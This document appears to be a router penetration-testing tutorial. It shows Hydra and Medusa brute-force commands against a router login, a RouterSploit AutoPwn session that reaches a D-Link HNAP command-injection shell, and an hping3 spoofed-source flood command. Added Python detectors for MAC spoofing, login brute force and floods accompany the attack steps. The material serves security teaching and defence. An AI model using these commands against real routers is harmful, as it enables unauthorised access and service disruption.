Router Penetration Testing
===========================

The router is the central connecting device that provides connectivity to all the end devices and nodes, along with the network components, of a particular network. Router pentesting is a process in which a network auditor cross-checks all the possible information-gathering and exploitation methods that apply to the router. The goal of router pentesting is to establish the scope of the network by identifying the total number of access points, the MAC address of each router, the router's model number, vendor name and firmware version.

There are two types of attack procedures for that:

Active Router Attack: In this attack we attack the router's IP directly (mostly 192.168.0.1 or 192.168.1.1), trying to halt the services on the network and get the juicy data out of the router.
Eg. credential brute-force attack, Wi-Fi jammer, etc. on public networks.

Passive Router Attack: In this attack we do not engage the router in the process; instead we work with the broadcast packet data generated by the router. The attack doesn't go directly to the router, but the attacker uses the data that originates from, or passes through, the router.
Eg. sniffing and monitoring the Wi-Fi traffic, doing MITM and other things.
Attack Vectors

Information Gathering of the Router:

When connected to the network:
Terminal: route -n
Terminal: netdiscover -r 192.168.0.1/24
(This can be used for getting the MAC address of the router.)

Once we have the MAC address, https://www.macvendorlookup.com/ can be used to look up the vendor name.

How to find out more about the router vendor (when the MAC address is spoofed):
airmon-ng start wlan0
airodump-ng -M --bssid <router BSSID> -c <channel> wlan0mon    (use a big terminal window; replace the placeholders with the router's BSSID and channel)
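As an added example that is not part of the original notes, here is the defender's version of the vendor lookup above: it parses netdiscover's table output, resolves the OUI offline against a small constructed vendor table (a real audit would load the IEEE OUI registry), and flags any MAC whose locally-administered bit is set, since a burned-in vendor address never has that bit and a spoofed or randomised one usually does. The sample output and the OUI entries are constructed, not a real capture.

```python
import re

# Constructed sample OUI table (first three octets -> vendor), illustrative only;
# a real audit would load the IEEE OUI registry instead.
OUI_TABLE = {
    "00:11:22": "ExampleRouterCo",
    "A4:BB:CC": "ExampleCamCorp",
}

# One data row of netdiscover's table: IP, MAC, count, length, vendor text.
ROW_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+\d+\s+\d+\s+(.*?)\s*$"
)


def is_locally_administered(mac: str) -> bool:
    """True when the U/L bit (0x02) of the first octet is set: the address was
    not burned in by a vendor, which is how a spoofed or randomised MAC looks."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def lookup_vendor(mac: str) -> str:
    """Offline OUI lookup (stand-in for the macvendorlookup.com web lookup)."""
    return OUI_TABLE.get(mac.upper()[:8], "unknown")


def audit_hosts(netdiscover_output):
    """Parse netdiscover rows and annotate each host with vendor and spoof indicator."""
    hosts = []
    for line in netdiscover_output.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header, separator or blank line
        mac = m.group(2).upper()
        hosts.append({"ip": m.group(1), "mac": mac, "vendor": lookup_vendor(mac),
                      "locally_administered": is_locally_administered(mac)})
    return hosts


# Constructed output in netdiscover's table layout (not a real capture).
SAMPLE = """\
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.1     00:11:22:33:44:55      1      60  Unknown vendor
 192.168.0.23    a4:bb:cc:dd:ee:ff      3     180  Unknown vendor
 192.168.0.42    02:de:ad:be:ef:01      1      60  Unknown vendor
"""

if __name__ == "__main__":
    for h in audit_hosts(SAMPLE):
        flag = "  <- locally administered (possible spoof)" if h["locally_administered"] else ""
        print(f'{h["ip"]:<15} {h["mac"]} {h["vendor"]}{flag}')
```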
-----------------------------------------------------------------
Default router password lists:
http://192-168-1-1ip.mobi/default-router-passwords-list/
http://www.routerpasswords.com/
https://www.bestvpn.com/default-router-login-details/
Brute Forcing Default Credentials:

Default credentials are the router login-page credentials that have not been changed since the router was purchased.
Mostly the username is just Admin.
For brute forcing we are going to use some advanced brute-force tools that come pre-installed in Kali Linux.
Tools: Hydra, Medusa, Xhydra, Burp Suite

Attacking Methods:
Hydra: # hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
Here, -l: username; -P: password list, where we supply a dictionary of credentials (rockyou.txt); http-get / http-post: the way the login data is transmitted; 192.168.0.1: the router's default IP address.
Medusa: # medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http
Here, -h: target IP address; -u: username; -P: password file, where we can supply a dictionary of credentials; -M: the module (protocol) used for transmission.
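From the defender's side, the dictionary attack above leaves a very recognisable trail: one source producing a stream of HTTP 401 responses against the login page. The following is an added example, not part of the original notes, that runs a sliding-window count of 401s per source over web-server access-log lines in combined log format (a router or reverse proxy that logs in that format is an assumption; the log lines here are constructed).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined log format: client IP, identd, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def detect_auth_bruteforce(lines, threshold=10, window_s=60):
    """Return (src_ip, first_failure, count) for every source that produces
    `threshold` or more HTTP 401 responses inside a sliding `window_s`-second
    window: the footprint hydra/medusa leave when walking a wordlist against
    the router's login page. Each source is reported once."""
    recent = defaultdict(deque)          # src ip -> timestamps of recent 401s
    alerted, alerts = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("status") != "401":
            continue                     # malformed line or not an auth failure
        ip = m.group("ip")
        ts = datetime.strptime(m.group("ts"), TS_FMT)
        q = recent[ip]
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()                  # forget failures older than the window
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append((ip, q[0], len(q)))
    return alerts


def make_sample_log():
    """Constructed access-log lines (not a real capture): one host failing
    Basic auth on / every two seconds, plus one successful login from another."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=2 * i)).strftime(TS_FMT)
        lines.append(f'192.168.0.50 - - [{ts}] "GET / HTTP/1.1" 401 188 "-" "-"')
    ts = (base + timedelta(seconds=5)).strftime(TS_FMT)
    lines.append(f'192.168.0.7 - - [{ts}] "GET / HTTP/1.1" 200 5120 "-" "-"')
    return lines


if __name__ == "__main__":
    for ip, first, n in detect_auth_bruteforce(make_sample_log()):
        print(f"{ip}: {n} failed logins since {first.isoformat()}")
```

Pair the alert with a lockout or rate limit on the login endpoint, and with changing the default credentials, which removes the reason the attack works in the first place.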
Routersploit Framework (RSF)
========================

It is a tool written in Python used for automating the process of router exploitation. It is not pre-installed in Kali Linux, so we have to get it from an external source.

Downloading Steps:
Installation on Kali Linux:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Running Steps:
When the Routersploit Framework is running:
rsf > help    (for the help menu)

Global commands:
    help                          Print this help menu
    use <module>                  Select a module for usage
    exec <shell command> <args>   Execute a command in a shell
    search <search term>          Search for appropriate module
    exit                          Exit RouterSploit

rsf > use scanners/    (using scanners: this will show the list of every scanner)
scanners/2wire_scan     scanners/billion_scan      scanners/huawei_scan    scanners/netcore_scan      scanners/tplink_scan
scanners/3com_scan      scanners/cameras_scan      scanners/ipfire_scan    scanners/netgear_scan      scanners/ubiquiti_scan
scanners/asmax_scan     scanners/cisco_scan        scanners/juniper_scan   scanners/netsys_scan       scanners/zte_scan
scanners/asus_scan      scanners/comtrend_scan     scanners/linksys_scan   scanners/routers_scan      scanners/zyxel_scan
scanners/autopwn        scanners/dlink_scan        scanners/misc_scan      scanners/shuttle_scan
scanners/belkin_scan    scanners/fortinet_scan     scanners/movistar_scan  scanners/technicolor_scan
scanners/bhu_scan       scanners/grandstream_scan  scanners/multi_scan     scanners/thomson_scan
rsf > use scanners/autopwn    (auto-search: tries every scanner against the target)
rsf (AutoPwn) > show options

Target options:

   Name     Current settings     Description
   ----     ----------------     -----------
   target                        Target IP address e.g. 192.168.1.1
   port     80                   Target port

Module options:

   Name     Current settings     Description
   ----     ----------------     -----------
   threads  8                    Number of threads

rsf (AutoPwn) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (AutoPwn) > show options

Target options:

   Name     Current settings     Description
   ----     ----------------     -----------
   target   192.168.0.1          Target IP address e.g. 192.168.1.1
   port     80                   Target port

Module options:

   Name     Current settings     Description
   ----     ----------------     -----------
   threads  8                    Number of threads

rsf (AutoPwn) > run
[*] Could not verify exploitability:
 - exploits/routers/dlink/dsl_2740r_dns_change
 - exploits/routers/dlink/dir_815_850l_rce
 - exploits/routers/dlink/dsl_2640b_dns_change
 - exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
 - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
 - exploits/routers/shuttle/915wm_dns_change
 - exploits/routers/billion/5200w_rce
 - exploits/routers/cisco/catalyst_2960_rocem
 - exploits/routers/cisco/secure_acs_bypass

[+] Device is vulnerable:
 - exploits/routers/dlink/multi_hnap_rce

rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) > show options

Target options:

   Name     Current settings     Description
   ----     ----------------     -----------
   target                        Target address e.g. http://192.168.1.1
   port     80                   Target Port

rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (D-Link Multi HNAP RCE) > show options

Target options:

   Name     Current settings     Description
   ----     ----------------     -----------
   target   http://192.168.0.1   Target address e.g. http://192.168.1.1
   port     80                   Target Port

rsf (D-Link Multi HNAP RCE) > run
[*] Running module...
[*] Target might be vulnerable - it is hard to verify
[*] Invoking command loop...
[*] It is blind command injection, response is not available
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] Depending on the vulnerability, command's results might not be available.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
-----------------------------------------------------------------
DDOS
hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306
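What distinguishes the flood above from an ordinary busy client is not just the packet rate but the source addresses: --rand-source makes nearly every packet arrive from a different spoofed IP. As an added example that is not part of the original notes, the detector below buckets per-packet summaries (as a sensor or flow exporter would provide; the records are constructed) by destination, port and second, and raises an alert only when both the rate and the unique-source ratio are high, so a single legitimate client hammering port 3306 does not trip it.

```python
import random
from collections import defaultdict
from typing import List, NamedTuple, Tuple


class Pkt(NamedTuple):
    """Minimal per-packet summary as a sensor or flow exporter would provide."""
    ts: float     # epoch seconds
    src: str
    dst: str
    dport: int


def detect_spoofed_flood(pkts, rate=100, uniq_ratio=0.5) -> List[Tuple[str, int, int, int, int]]:
    """Bucket packets per (dst, dport, whole second) and flag a bucket when it
    carries more than `rate` packets AND most of them come from distinct sources.
    One chatty client has a unique-source ratio near 0; a --rand-source flood
    has a ratio near 1.0. Returns (dst, dport, second, packets, unique_srcs)."""
    buckets = defaultdict(list)
    for p in pkts:
        buckets[(p.dst, p.dport, int(p.ts))].append(p.src)
    alerts = []
    for (dst, dport, sec), srcs in sorted(buckets.items()):
        uniq = len(set(srcs))
        if len(srcs) > rate and uniq / len(srcs) >= uniq_ratio:
            alerts.append((dst, dport, sec, len(srcs), uniq))
    return alerts


def make_flood_sample(seed=1) -> List[Pkt]:
    """Constructed packet summaries (not a real capture): 300 packets to
    192.168.195.183:3306 inside one second, each from a random spoofed source."""
    rng = random.Random(seed)
    t0 = 1_700_000_000
    return [Pkt(t0 + i / 300, ".".join(str(rng.randrange(1, 255)) for _ in range(4)),
                "192.168.195.183", 3306) for i in range(300)]


def make_normal_sample() -> List[Pkt]:
    """Constructed baseline: one client sending 120 packets in a second
    (busy, but not spoofed), which must not trigger the alert."""
    t0 = 1_700_000_000
    return [Pkt(t0 + i / 120, "192.168.195.10", "192.168.195.183", 3306) for i in range(120)]


if __name__ == "__main__":
    for dst, dport, sec, n, uniq in detect_spoofed_flood(make_flood_sample() + make_normal_sample()):
        print(f"flood towards {dst}:{dport} at t={sec}: {n} packets from {uniq} distinct sources")
```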